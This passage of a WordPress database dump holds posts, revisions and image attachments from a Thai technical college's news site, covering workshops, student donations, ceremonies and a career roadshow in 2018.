(3857, 3, '2018-08-28 09:57:50', '2018-08-28 02:57:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1940274872659374&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 24 สิงหาคม 2561 พลเอกสุรเชษฐ์ ชัยวงศ์ รัฐมนตรีช่วยว่าการกระทรวงศึกษาธิการ เป็นประธานในพิธีเปิดงานเปิดบ้านการศึกษาในเขตพัฒนาพิเศษภาคตะวันออก (EEC) และเยี่ยมชมนิทรรศการของสถานศึกษาต่างๆ ณ โรงเรียนเบญจมราชรังสฤษฎิ์ จังหวัดฉะเชิงเทรา', '', 'inherit', 'closed', 'closed', '', '3855-revision-v1', '', '', '2018-08-28 09:57:50', '2018-08-28 02:57:50', '', 3855, 'http://www.technicrayong.ac.th/3855-revision-v1/', 0, 'revision', '', 0),
(3859, 3, '2018-08-28 14:31:41', '2018-08-28 07:31:41', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.660610230981835&type=3\"><img class=\"aligncenter wp-image-3830 size-full\" src=\"/wp-content/uploads/2018/08/21-8-2561-8-43-46.jpg\" alt=\"\" width=\"463\" height=\"632\" /></a>', 'From the 18th to the 19th, the 25th to the 26th of August 2018 and again on the 1st of September 2018, Rayong Technical College worked side by side with Global Power Synergy Publish Company Limited to set up a workshop on professional training for wiring technicians. The aim is to survey and provide support to the power system with updates and 2nd of September 2018 there will be workmanship labor standard tests', '', 'publish', 'closed', 'open', '', 'from-the-18th-to-the-19th-the-25th-to-the-26th-of-august-2018-and-on-the-1st-of-september-2018-rayong-technical-college-worked-side-by-side-with-global-power-synergy-publish-company-limited-to-set-u', '', '', '2018-08-28 15:03:07', '2018-08-28 08:03:07', '', 0, 'http://www.technicrayong.ac.th/?p=3859', 324, 'post', '', 0),
(3860, 3, '2018-08-28 14:31:41', '2018-08-28 07:31:41', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.660610230981835&type=3\"><img class=\"aligncenter wp-image-3830 size-full\" src=\"/wp-content/uploads/2018/08/21-8-2561-8-43-46.jpg\" alt=\"\" width=\"463\" height=\"632\" /></a>', 'From the 18th to the 19th, the 25th to the 26th of August 2018 and On the 1st of September 2018, Rayong Technical College worked side by side with Global Power Synergy Publish Company Limited to set up a workshop on professional training for wiring technicians. The aim is to survey and provide support to the power system with updates and 2nd of September 2018 there will be workmanship labor standard tests.', '', 'inherit', 'closed', 'closed', '', '3859-revision-v1', '', '', '2018-08-28 14:31:41', '2018-08-28 07:31:41', '', 3859, 'http://www.technicrayong.ac.th/3859-revision-v1/', 0, 'revision', '', 0),
(3861, 3, '2018-08-28 15:03:07', '2018-08-28 08:03:07', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.660610230981835&type=3\"><img class=\"aligncenter wp-image-3830 size-full\" src=\"/wp-content/uploads/2018/08/21-8-2561-8-43-46.jpg\" alt=\"\" width=\"463\" height=\"632\" /></a>', 'From the 18th to the 19th, the 25th to the 26th of August 2018 and again on the 1st of September 2018, Rayong Technical College worked side by side with Global Power Synergy Publish Company Limited to set up a workshop on professional training for wiring technicians. The aim is to survey and provide support to the power system with updates and 2nd of September 2018 there will be workmanship labor standard tests', '', 'inherit', 'closed', 'closed', '', '3859-revision-v1', '', '', '2018-08-28 15:03:07', '2018-08-28 08:03:07', '', 3859, 'http://www.technicrayong.ac.th/3859-revision-v1/', 0, 'revision', '', 0),
(3862, 3, '2018-08-29 14:25:20', '2018-08-29 07:25:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.669949596714565%26type%3D3&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 29 สิงหาคม 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา เข้าร่วมพิธีเปิดการประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ประจำปีการศึกษา 2561 โครงการประกวดสิ่งประดิษฐ์จากของเหลือใช้ Recycle Fashion Designer 2018 และโครงการประกวดร้องเพลง โฟล์คซอง วงดนตรีสากล ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-29-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9', '', '', '2018-08-29 14:26:26', '2018-08-29 07:26:26', '', 0, 'http://www.technicrayong.ac.th/?p=3862', 323, 'post', '', 0),
(3863, 3, '2018-08-29 14:24:56', '2018-08-29 07:24:56', '', '40158656_669946960048162_2557683768143904768_o', '', 'inherit', 'closed', 'closed', '', '40158656_669946960048162_2557683768143904768_o', '', '', '2018-08-29 14:24:56', '2018-08-29 07:24:56', '', 3862, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/40158656_669946960048162_2557683768143904768_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3864, 3, '2018-08-29 14:25:20', '2018-08-29 07:25:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.669949596714565%26type%3D3&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 29 สิงหาคม 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา เข้าร่วมพิธีเปิดการประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ประจำปีการศึกษา 2561 โครงการประกวดสิ่งประดิษฐ์จากของเหลือใช้ Recycle Fashion Designer 2018 และโครงการประกวดร้องเพลง โฟล์คซอง วงดนตรีสากล ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3862-revision-v1', '', '', '2018-08-29 14:25:20', '2018-08-29 07:25:20', '', 3862, 'http://www.technicrayong.ac.th/3862-revision-v1/', 0, 'revision', '', 0),
(3865, 3, '2018-08-29 15:13:23', '2018-08-29 08:13:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1935084059845122&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Tuesday 21st August 2018, Eastern Polypack Company Limited made a generous donation to colleges in the eastern area for the academic year of 2018. Five 1st year diploma students of Rayong Technical College each received 5,000 baht for a total of 25,000 baht', '', 'publish', 'closed', 'open', '', 'on-tuesday-21st-august-2018-eastern-polypack-company-limited-made-a-generous-donation-to-colleges-in-the-eastern-area-for-the-academic-year-of-2018-five-1st-year-diploma-students-of-rayong-technica', '', '', '2018-08-29 15:13:23', '2018-08-29 08:13:23', '', 0, 'http://www.technicrayong.ac.th/?p=3865', 322, 'post', '', 0),
(3866, 3, '2018-08-29 15:13:23', '2018-08-29 08:13:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1935084059845122&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Tuesday 21st August 2018, Eastern Polypack Company Limited made a generous donation to colleges in the eastern area for the academic year of 2018. Five 1st year diploma students of Rayong Technical College each received 5,000 baht for a total of 25,000 baht', '', 'inherit', 'closed', 'closed', '', '3865-revision-v1', '', '', '2018-08-29 15:13:23', '2018-08-29 08:13:23', '', 3865, 'http://www.technicrayong.ac.th/3865-revision-v1/', 0, 'revision', '', 0),
(3868, 3, '2018-08-30 10:25:24', '2018-08-30 03:25:24', '', '30-8-2561 10-27-44', '', 'inherit', 'closed', 'closed', '', '30-8-2561-10-27-44', '', '', '2018-08-30 10:25:24', '2018-08-30 03:25:24', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/30-8-2561-10-27-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(3869, 3, '2018-08-30 13:49:02', '2018-08-30 06:49:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664868340556024%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Saturday 18th August 2018, Rayong Technical College is holding a good governance academy workshop project. The goal is to promote awareness, acceptance, honesty, order and get volunteers to follow the ten thousand hands volunteer project.', '', 'publish', 'closed', 'open', '', 'on-saturday-18th-august-2018-rayong-technical-college-is-holding-a-good-governance-academy-workshop-project-the-goal-is-to-promote-awareness-acceptance-honesty-order-and-get-volunteers-to-follow', '', '', '2018-08-30 13:49:02', '2018-08-30 06:49:02', '', 0, 'http://www.technicrayong.ac.th/?p=3869', 320, 'post', '', 0),
(3870, 3, '2018-08-30 13:49:02', '2018-08-30 06:49:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664868340556024%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Saturday 18th August 2018, Rayong Technical College is holding a good governance academy workshop project. The goal is to promote awareness, acceptance, honesty, order and get volunteers to follow the ten thousand hands volunteer project.', '', 'inherit', 'closed', 'closed', '', '3869-revision-v1', '', '', '2018-08-30 13:49:02', '2018-08-30 06:49:02', '', 3869, 'http://www.technicrayong.ac.th/3869-revision-v1/', 0, 'revision', '', 0),
(3871, 3, '2018-08-30 13:51:08', '2018-08-30 06:51:08', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.664910343885157&type=3\"><img class=\"aligncenter wp-image-3849 size-full\" src=\"/wp-content/uploads/2018/08/28-8-2561-9-45-00.jpg\" alt=\"\" width=\"460\" height=\"626\" /></a>', 'On Wednesday 22nd August 2018, Rayong Technical College was chosen to be the moral vocational education model in Rayong province. Rayong Technical College will represent all up and coming projects in the eastern region', '', 'publish', 'closed', 'open', '', 'on-wednesday-22nd-august-2018-rayong-technical-college-was-chosen-to-be-the-moral-vocational-education-model-in-rayong-province-rayong-technical-college-will-represent-all-up-and-coming-projects-in', '', '', '2018-08-30 13:51:08', '2018-08-30 06:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=3871', 319, 'post', '', 0),
(3872, 3, '2018-08-30 13:51:08', '2018-08-30 06:51:08', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.664910343885157&type=3\"><img class=\"aligncenter wp-image-3849 size-full\" src=\"/wp-content/uploads/2018/08/28-8-2561-9-45-00.jpg\" alt=\"\" width=\"460\" height=\"626\" /></a>', 'On Wednesday 22nd August 2018, Rayong Technical College was chosen to be the moral vocational education model in Rayong province. Rayong Technical College will represent all up and coming projects in the eastern region', '', 'inherit', 'closed', 'closed', '', '3871-revision-v1', '', '', '2018-08-30 13:51:08', '2018-08-30 06:51:08', '', 3871, 'http://www.technicrayong.ac.th/3871-revision-v1/', 0, 'revision', '', 0),
(3873, 3, '2019-06-10 18:45:01', '2019-06-10 11:45:01', '<h3>รายงานประเมินตนเอง (SAR) ปีการศึกษา 2561 <span style=\"color: #ff0000;\">NEW!!</span></h3>\n<h3><a href=\"/wp-content/uploads/2018/09/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2560-1.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2560</a> <span style=\"color: #ff0000;\">NEW!!</span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2559.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2559</a> </span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2558.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2558</a> </span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2557.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2557</a> </span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2556.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2556</a> </span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2555.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2555</a> </span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2554.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2554</a> </span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2553.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2553</a> </span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2552.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2552</a></span></h3>', 'รายงานการประเมินตนเอง (SAR)', '', 'inherit', 'closed', 'closed', '', '2871-autosave-v1', '', '', '2019-06-10 18:45:01', '2019-06-10 11:45:01', '', 2871, 'http://www.technicrayong.ac.th/2871-autosave-v1/', 0, 'revision', '', 0),
(3874, 3, '2018-08-31 10:44:10', '2018-08-31 03:44:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F08%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B8%A2%E0%B8%B2%E0%B8%A2%E0%B8%99-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกันยายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561', '', '', '2018-08-31 10:44:10', '2018-08-31 03:44:10', '', 0, 'http://www.technicrayong.ac.th/?p=3874', 318, 'post', '', 0),
(3876, 3, '2018-08-31 10:44:10', '2018-08-31 03:44:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F08%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B8%A2%E0%B8%B2%E0%B8%A2%E0%B8%99-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกันยายน 2561', '', 'inherit', 'closed', 'closed', '', '3874-revision-v1', '', '', '2018-08-31 10:44:10', '2018-08-31 03:44:10', '', 3874, 'http://www.technicrayong.ac.th/3874-revision-v1/', 0, 'revision', '', 0),
(3878, 3, '2018-09-03 12:49:38', '2018-09-03 05:49:38', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.670468333329358&type=3\"><img class=\"aligncenter size-full wp-image-3879\" src=\"/wp-content/uploads/2018/09/3-9-2561-12-50-02.jpg\" alt=\"\" width=\"456\" height=\"643\" /></a>', 'วันพฤหัสบดีที่ 30 สิงหาคม 2561 นักเรียน ระดับ ปวช.2 และนักศึกษา ระดับ ปวส.1 แผนกวิชาอาหารและโภชนาการ เข้าร่วมโครงการอบรมเชิงปฏิบัติการเพื่อพัฒนาทักษะวิชาชีพ ซึ่งเป็นงานที่เกี่ยวข้องกับสาขาวิชาที่ผู้เรียนกำลังศึกษาอยู่ อีกทั้งเป็นการเสริมสร้างความรู้และปลูกฝังให้ผู้เรียน รู้จักอาหารถิ่นที่มีในภูมิลำเนาของตนเอง รวมถึงกระบวนการนำวัตถุดิบที่มีในพื้นถิ่นมาประกอบอาหารต่างๆได้อย่างมีประสิทธิภาพ โดยเชฟชุมพล แจ้งไพร ผู้อำนวยการโรงเรียนการอาหารไทย MSC ให้เกียรติมาเป็นวิทยากร ณ ห้องประชุม Smart Class Room วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-30-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-09-03 12:49:38', '2018-09-03 05:49:38', '', 0, 'http://www.technicrayong.ac.th/?p=3878', 317, 'post', '', 0),
(3879, 3, '2018-09-03 12:47:43', '2018-09-03 05:47:43', '', '3-9-2561 12-50-02', '', 'inherit', 'closed', 'closed', '', '3-9-2561-12-50-02', '', '', '2018-09-03 12:47:43', '2018-09-03 05:47:43', '', 3878, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/3-9-2561-12-50-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(3880, 3, '2018-09-03 12:49:22', '2018-09-03 05:49:22', '', '40380036_670446053331586_5221965175715790848_o', '', 'inherit', 'closed', 'closed', '', '40380036_670446053331586_5221965175715790848_o', '', '', '2018-09-03 12:49:22', '2018-09-03 05:49:22', '', 3878, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/40380036_670446053331586_5221965175715790848_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3881, 3, '2018-09-03 12:49:38', '2018-09-03 05:49:38', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.670468333329358&type=3\"><img class=\"aligncenter size-full wp-image-3879\" src=\"/wp-content/uploads/2018/09/3-9-2561-12-50-02.jpg\" alt=\"\" width=\"456\" height=\"643\" /></a>', 'วันพฤหัสบดีที่ 30 สิงหาคม 2561 นักเรียน ระดับ ปวช.2 และนักศึกษา ระดับ ปวส.1 แผนกวิชาอาหารและโภชนาการ เข้าร่วมโครงการอบรมเชิงปฏิบัติการเพื่อพัฒนาทักษะวิชาชีพ ซึ่งเป็นงานที่เกี่ยวข้องกับสาขาวิชาที่ผู้เรียนกำลังศึกษาอยู่ อีกทั้งเป็นการเสริมสร้างความรู้และปลูกฝังให้ผู้เรียน รู้จักอาหารถิ่นที่มีในภูมิลำเนาของตนเอง รวมถึงกระบวนการนำวัตถุดิบที่มีในพื้นถิ่นมาประกอบอาหารต่างๆได้อย่างมีประสิทธิภาพ โดยเชฟชุมพล แจ้งไพร ผู้อำนวยการโรงเรียนการอาหารไทย MSC ให้เกียรติมาเป็นวิทยากร ณ ห้องประชุม Smart Class Room วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3878-revision-v1', '', '', '2018-09-03 12:49:38', '2018-09-03 05:49:38', '', 3878, 'http://www.technicrayong.ac.th/3878-revision-v1/', 0, 'revision', '', 0),
(3882, 3, '2018-09-03 12:52:25', '2018-09-03 05:52:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D670467593329432%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง จัดโครงการอบรมเสริมสร้างภาวผู้นำ ให้กับนักเรียน นักศึกษา โดยมีนายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด และการบรรยายให้ความรู้เกี่ยวกับภาวะการเป็นผู้นำ โดยท่านสาธิตา ทันตเวช ผู้อำนวยการวิทยาลัยสารพัดช่างลพบุรี ในระหว่างวันที่ 23-25 สิงหาคม 2561 ที่ผ่านมา ณ ภูรพี รีสอร์ท จังหวัดนครราชสีมา', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%88%e0%b8%b1-2', '', '', '2018-09-03 12:52:25', '2018-09-03 05:52:25', '', 0, 'http://www.technicrayong.ac.th/?p=3882', 316, 'post', '', 0),
(3883, 3, '2018-09-03 12:51:52', '2018-09-03 05:51:52', '', '40358220_670466216662903_249021310468882432_o', '', 'inherit', 'closed', 'closed', '', '40358220_670466216662903_249021310468882432_o', '', '', '2018-09-03 12:51:52', '2018-09-03 05:51:52', '', 3882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/40358220_670466216662903_249021310468882432_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3884, 3, '2018-09-03 12:52:25', '2018-09-03 05:52:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D670467593329432%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง จัดโครงการอบรมเสริมสร้างภาวผู้นำ ให้กับนักเรียน นักศึกษา โดยมีนายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด และการบรรยายให้ความรู้เกี่ยวกับภาวะการเป็นผู้นำ โดยท่านสาธิตา ทันตเวช ผู้อำนวยการวิทยาลัยสารพัดช่างลพบุรี ในระหว่างวันที่ 23-25 สิงหาคม 2561 ที่ผ่านมา ณ ภูรพี รีสอร์ท จังหวัดนครราชสีมา', '', 'inherit', 'closed', 'closed', '', '3882-revision-v1', '', '', '2018-09-03 12:52:25', '2018-09-03 05:52:25', '', 3882, 'http://www.technicrayong.ac.th/3882-revision-v1/', 0, 'revision', '', 0),
(3885, 3, '2018-09-03 12:56:42', '2018-09-03 05:56:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1951621358191392&width=500\" width=\"500\" height=\"860\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันที่ 2 กันยายน 2561 ดร.บุญส่ง จำปาโพธิ์ รองเลขาธิการคณะกรรมการการอาชีวศึกษา เป็นประธานในพิธีเปิดการประชุมสัมมนาเชิงปฏิบัติการแลกเปลี่ยนเรียนรู้การดำเนินงานขับเคลื่อนสถานศึกษาคุณธรรมอาชีวศึกษาและแสดงผลงานโครงงานคุณธรรมนักเรียน นักศึกษา เขตภาคตะวันออกและกรุงเทพมหานคร ณ โรงแรมสตาร์ จังหวัดระยอง ซึ่งในการประชุมสัมมนาดังกล่าววิทยาลัยเทคนิคระยองได้ร่วมแสดงผลงานโครงงานคุณธรรมนักเรียน นักศึกษา เพื่อแลกเปลี่ยนเรียนรู้', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-2-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%94%e0%b8%a3-%e0%b8%9a%e0%b8%b8%e0%b8%8d%e0%b8%aa%e0%b9%88%e0%b8%87', '', '', '2018-09-03 12:56:42', '2018-09-03 05:56:42', '', 0, 'http://www.technicrayong.ac.th/?p=3885', 315, 'post', '', 0),
(3886, 3, '2018-09-03 12:56:29', '2018-09-03 05:56:29', '', '40595657_1951606901526171_1882888197705302016_o', '', 'inherit', 'closed', 'closed', '', '40595657_1951606901526171_1882888197705302016_o', '', '', '2018-09-03 12:56:29', '2018-09-03 05:56:29', '', 3885, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/40595657_1951606901526171_1882888197705302016_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3887, 3, '2018-09-03 12:56:42', '2018-09-03 05:56:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1951621358191392&width=500\" width=\"500\" height=\"860\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันที่ 2 กันยายน 2561 ดร.บุญส่ง จำปาโพธิ์ รองเลขาธิการคณะกรรมการการอาชีวศึกษา เป็นประธานในพิธีเปิดการประชุมสัมมนาเชิงปฏิบัติการแลกเปลี่ยนเรียนรู้การดำเนินงานขับเคลื่อนสถานศึกษาคุณธรรมอาชีวศึกษาและแสดงผลงานโครงงานคุณธรรมนักเรียน นักศึกษา เขตภาคตะวันออกและกรุงเทพมหานคร ณ โรงแรมสตาร์ จังหวัดระยอง ซึ่งในการประชุมสัมมนาดังกล่าววิทยาลัยเทคนิคระยองได้ร่วมแสดงผลงานโครงงานคุณธรรมนักเรียน นักศึกษา เพื่อแลกเปลี่ยนเรียนรู้', '', 'inherit', 'closed', 'closed', '', '3885-revision-v1', '', '', '2018-09-03 12:56:42', '2018-09-03 05:56:42', '', 3885, 'http://www.technicrayong.ac.th/3885-revision-v1/', 0, 'revision', '', 0),
(3888, 3, '2018-09-03 13:02:38', '2018-09-03 06:02:38', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664968360546022%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 22nd August 2018, Thai-Oil Energy Services Company Limited (TES) made a CAREER ROADSHOW event “Mind Power and Stable Life Refined with Thai-Oil”. This event contained Thai-Oil business introduction and “How to do job interview to hit into HR’s mind?” subjects. Also open for recruitment and a written exam that had the student’s second diploma Technology Production, Metal Techniques, Measuring Instrument, Petrochemical, Industrial Chemistry, Rubber and Polymer.', '', 'publish', 'closed', 'open', '', 'on-wednesday-22nd-august-2018-thai-oil-energy-services-company-limited-tes-made-a-career-roadshow-event-mind-power-and-stable-life-refined-with-thai-oil-this-event-contained-thai', '', '', '2018-09-03 13:02:38', '2018-09-03 06:02:38', '', 0, 'http://www.technicrayong.ac.th/?p=3888', 314, 'post', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3889, 3, '2018-09-03 13:02:38', '2018-09-03 06:02:38', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664968360546022%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 22nd August 2018, Thai-Oil Energy Services Company Limited (TES) made a CAREER ROADSHOW event “Mind Power and Stable Life Refined with Thai-Oil”. This event contained Thai-Oil business introduction and “How to do job interview to hit into HR’s mind?” subjects. Also open for recruitment and a written exam that had the student’s second diploma Technology Production, Metal Techniques, Measuring Instrument, Petrochemical, Industrial Chemistry, Rubber and Polymer.', '', 'inherit', 'closed', 'closed', '', '3888-revision-v1', '', '', '2018-09-03 13:02:38', '2018-09-03 06:02:38', '', 3888, 